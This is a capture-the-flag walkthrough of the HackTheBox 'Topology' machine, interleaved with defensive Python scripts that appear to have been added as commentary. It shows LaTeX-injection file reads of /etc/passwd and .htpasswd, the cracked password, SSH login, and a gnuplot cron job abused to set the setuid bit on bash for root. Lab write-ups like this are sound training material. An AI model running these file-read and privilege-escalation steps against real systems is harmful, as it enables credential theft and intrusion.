# HACKTHEBOX

# Topology

![](https://hackmd.io/_uploads/B1awJW-33.png)

## Creating Host

`sudo vim /etc/hosts`

Add the host as:

`10.10.11.217 topology.htb`

Link: http://topology.htb/

## Scanning

`nmap -A -sV 10.10.11.217`

![](https://hackmd.io/_uploads/SkZYyZ-2h.png)

Visit http://topology.htb/

![](https://hackmd.io/_uploads/HyntkZW33.png)

Found a LaTeX Equation Generator, but its link could not be followed, so this hostname also has to be added to `/etc/hosts`.

Had no idea about this website, so I searched for LaTeX equation vulnerabilities and found **[Formula/CSV/Doc/LaTeX Injection - HackTricks](https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection).**

![](https://hackmd.io/_uploads/HyF5y-Zhn.png)

![](https://hackmd.io/_uploads/SJ1o1Wb2h.png)

Now I wanted to read files through the LaTeX code generator.

command: `\input{/etc/passwd}`

💡 This is a LaTeX language issue: when I execute the command it is in "text" mode; wrapping it in `$` switches to "math mode", where equations are evaluated and the command is executed.

command: `$\input{/etc/passwd}$`

As we know, the /etc/passwd file is used **to keep track of every registered user that has access to a system.**

command: `$\lstinputlisting{/etc/passwd}$`

![](https://hackmd.io/_uploads/HklzWW-hh.jpg)

Nothing much could be found here, let's scan for some directories.
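The file read above works because the equation generator hands user input straight to a LaTeX engine, which processes `\input` and `\lstinputlisting` like any other command. The server-side fix is to accept only a known set of math commands rather than trying to enumerate bad ones. The following is an added example of such an allowlist filter; it is not code from the box or from this writeup, and `ALLOWED_COMMANDS`, the 500-character limit and the `validate_formula` name are assumptions for a math-only renderer.

```python
import re

# Commands a math-only renderer is allowed to forward to the LaTeX engine.
# Constructed allowlist for this example, not the real service's configuration;
# extend it with whatever your renderer actually needs, nothing more.
ALLOWED_COMMANDS = {
    "frac", "sqrt", "sum", "prod", "int", "lim", "infty", "cdot", "times",
    "left", "right", "alpha", "beta", "gamma", "theta", "pi", "sigma",
    "sin", "cos", "tan", "log", "ln", "exp", "mathbb", "mathrm", "text",
}

# Escaped single characters that are harmless in a formula.
SAFE_SYMBOLS = {"{", "}", "$", "&", "_", "\\", ",", ";", " "}

# Every backslash command: \name, or a single-character control symbol.
_COMMAND_RE = re.compile(r"\\([A-Za-z]+|.)", re.DOTALL)

# '%' starts a TeX comment (hides the rest of the line from later checks),
# '#' is a macro parameter and '^^' is a TeX-level character escape.
_FORBIDDEN_CHARS = re.compile(r"[#%]|\^\^")


def validate_formula(src: str) -> tuple[bool, str]:
    """Return (ok, reason). Accept only if every command is on the allowlist."""
    if len(src) > 500:
        return False, "formula too long"
    if _FORBIDDEN_CHARS.search(src):
        return False, "forbidden character"
    for m in _COMMAND_RE.finditer(src):
        name = m.group(1)
        if name in SAFE_SYMBOLS:
            continue
        if name not in ALLOWED_COMMANDS:
            return False, f"command \\{name} not allowed"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: one legitimate formula, two file-read attempts as seen above.
    for candidate in (r"\frac{1}{2} + \sqrt{x}",
                      r"\input{/etc/passwd}",
                      r"$\lstinputlisting{/etc/passwd}$"):
        print(candidate, "->", validate_formula(candidate))
```

Run the check before anything reaches the engine, and still invoke the engine with `-no-shell-escape` and with TeX Live's `openin_any=p` (paranoid file-open mode), so that a gap in the filter does not by itself become a file read.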
## Scanning for Subdomains

Command: `wfuzz -c --hc=404 --hw=545 -t 200 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.topology.htb" http://topology.htb`

![](https://hackmd.io/_uploads/rk9wZZ-33.png)

Add dev.topology.htb and stats.topology.htb to `/etc/hosts`.

![](https://hackmd.io/_uploads/SJL2ZWbn2.png)

Now we need to bypass this authentication. As we have seen, this domain is running on Apache/2.4.41.

![](https://hackmd.io/_uploads/Hy3nbb-hh.png)

🔗 Bypass Apache/2.4.41 401 Unauthorized: [https://www.vidocsecurity.com/blog/401-and-403-bypass-how-to-do-it-right/](https://www.vidocsecurity.com/blog/401-and-403-bypass-how-to-do-it-right/)

Command: `$\lstinputlisting{/var/www/dev/.htpasswd}$`

![](https://hackmd.io/_uploads/ByYpWZ-n2.png)

Finally found a hash, rendered as a .PNG image.

![](https://hackmd.io/_uploads/HkP0-Zbhn.png)

Hash: `vdaisley : $apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0`

## Hash Cracking using John

command: `john --wordlist=/usr/share/wordlists/rockyou.txt hash`

![](https://hackmd.io/_uploads/ryUyM--2h.png)

Output: `?:calculus20`

![](https://hackmd.io/_uploads/Sk1ezWb2n.png)

As seen in our initial Nmap scan, we have a few SSH ports open.

## Connect to SSH

command: `ssh vdaisley@topology.htb`

password: `calculus20`

![](https://hackmd.io/_uploads/ByXWG-Z33.png)

For the user flag:

command: `cat user.txt`

## Gaining Root access

![](https://hackmd.io/_uploads/SkxTZzZWh2.png)

Nothing interesting found here, except an executable, "pspy64".

💡 pspy is a command line tool designed **to snoop on processes without need for root permissions**.
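Two things made the `.htpasswd` read above so damaging: the file sat under the web document root where the web-server-owned LaTeX process could reach it, and the credential used the MD5-based `$apr1$` scheme that john cracked with rockyou in seconds. The following is an added defender's audit script for `.htpasswd` files; it is not code from the box or from this writeup. The sample file contents, the `/var/www` document-root list and the function names are constructed assumptions for the example (the `vdaisley` entry is the one shown above; the second entry is a placeholder, not a real hash).

```python
import os
from pathlib import PurePosixPath

# Apache htpasswd hash prefixes -> (scheme, weak for new deployments?).
# $apr1$ is the MD5-based APR1 scheme seen in this box, $2y$/$2a$ are bcrypt,
# {SHA} is unsalted SHA-1, and anything else is treated as legacy crypt(3).
SCHEMES = [
    ("$apr1$", "apr1-md5", True),
    ("$2y$", "bcrypt", False),
    ("$2a$", "bcrypt", False),
    ("{SHA}", "sha1", True),
]


def classify(hash_field):
    """Return (scheme name, is_weak) for one htpasswd hash field."""
    for prefix, name, weak in SCHEMES:
        if hash_field.startswith(prefix):
            return name, weak
    return "crypt", True


def audit_htpasswd(text, path, docroots):
    """Audit one .htpasswd file's contents; return a list of human-readable findings."""
    findings = []
    p = PurePosixPath(path)
    # Finding 1: the file lives where web-server-owned processes can read it.
    for root in docroots:
        if p.is_relative_to(PurePosixPath(root)):
            findings.append(f"{path}: stored under document root {root}; "
                            f"move it outside the web tree")
    # Finding 2: weak hashing scheme per entry.
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, hash_field = line.partition(":")
        if not sep:
            findings.append(f"{path}:{lineno}: malformed entry")
            continue
        name, weak = classify(hash_field)
        if weak:
            findings.append(f"{path}:{lineno}: user {user!r} uses {name}; "
                            f"re-hash with bcrypt (htpasswd -B)")
    return findings


# Constructed sample, not the real file from the box.
SAMPLE_HTPASSWD = """\
# constructed sample for this example
vdaisley:$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0
admin:$2y$10$CONSTRUCTED.PLACEHOLDER.NOT.A.REAL.HASH
"""


def demo():
    return audit_htpasswd(SAMPLE_HTPASSWD, "/var/www/dev/.htpasswd", ["/var/www"])


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point it at every `.htpasswd` an Apache config references (`AuthUserFile`), and treat any hit on the first finding as the more urgent one: a strong hash in a readable file still leaks a username and an offline cracking target.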
command: `./pspy64`

![](https://hackmd.io/_uploads/BkAMfbb3n.png)

![](https://hackmd.io/_uploads/ry8QzW-32.png)

command: `cd /opt/gnuplot`

command: `ls`

Output: `ls: cannot open directory '.': Permission denied`

Create a file within the gnuplot dir:

command: bash-5.0$ `nano /opt/gnuplot/root.plt`

Reverse Shell - root.plt must contain `system "chmod u+s"`

command: `bash -p`

```
-p Turned on whenever the real and effective user ids do not match. Disables processing of the $ENV file and importing of shell functions. Turning this option off causes the effective uid and gid to be set to the real uid and gid.
```

command: `whoami` → root

Obtained root access. Now, move on to the root dir.

command: `cd /root`, `ls`, `cat root.txt`

Here is the root flag.

Output: `bb6b6780329a215d36126b6d6af62f1f`
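The root path above rests on two host misconfigurations that pspy made visible: a root-owned job consumes `.plt` files from a directory that an unprivileged user can write to, and the payoff is a setuid bit on a shell that `bash -p` then keeps. Both are cheap to detect. The following is an added audit script, not code from the box or from this writeup; it walks a tree for other-writable, non-sticky directories and for setuid interpreters, and `demo()` builds a constructed temporary layout mimicking `/opt/gnuplot` and a setuid `bash` so it runs anywhere. `SUSPICIOUS_BASENAMES` and the function names are assumptions for the example.

```python
import os
import stat
import tempfile

# Interpreters and shells that should never carry the setuid bit.
# Constructed list for this example; compare against your own baseline.
SUSPICIOUS_BASENAMES = {"bash", "sh", "dash", "zsh", "python3", "perl"}


def find_setuid(root):
    """Return regular files under root whose mode has the setuid bit set."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits


def is_suspicious_setuid(path):
    """True when a setuid file is a shell or interpreter (a classic persistence sign)."""
    return os.path.basename(path) in SUSPICIOUS_BASENAMES


def find_other_writable_dirs(root):
    """Directories under root (inclusive) writable by 'other' and without the sticky bit.

    Such a directory is dangerous whenever a privileged job reads scripts or
    configuration from it, as the gnuplot job on this box does.
    """
    hits = []
    for dirpath, _dirnames, _filenames in os.walk(root):
        try:
            mode = os.lstat(dirpath).st_mode
        except OSError:
            continue
        if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
            hits.append(dirpath)
    return hits


def demo():
    """Build a constructed layout in a temp dir and return what the checks flag.

    Returns (relative path of the suspicious setuid file or None,
             list of relative paths of other-writable directories).
    """
    with tempfile.TemporaryDirectory() as tmp:
        # Mimic the world-writable directory the root job reads .plt files from.
        job_dir = os.path.join(tmp, "opt", "gnuplot")
        os.makedirs(job_dir)
        os.chmod(job_dir, 0o777)
        # Mimic a shell binary that had chmod u+s applied to it.
        shell = os.path.join(tmp, "bin", "bash")
        os.makedirs(os.path.dirname(shell))
        with open(shell, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(shell, 0o4755)

        suid = [p for p in find_setuid(tmp) if is_suspicious_setuid(p)]
        writable = find_other_writable_dirs(tmp)
        return (os.path.relpath(suid[0], tmp) if suid else None,
                [os.path.relpath(d, tmp) for d in writable])


if __name__ == "__main__":
    print(demo())
```

On a real host run `find_setuid("/")` and `find_other_writable_dirs("/opt")` (or whichever directories your scheduled jobs read from) and diff the output against a known-good baseline; the remediation for the directory is to make it root-owned and `0755`, and for the shell to clear the bit and look for how it got there.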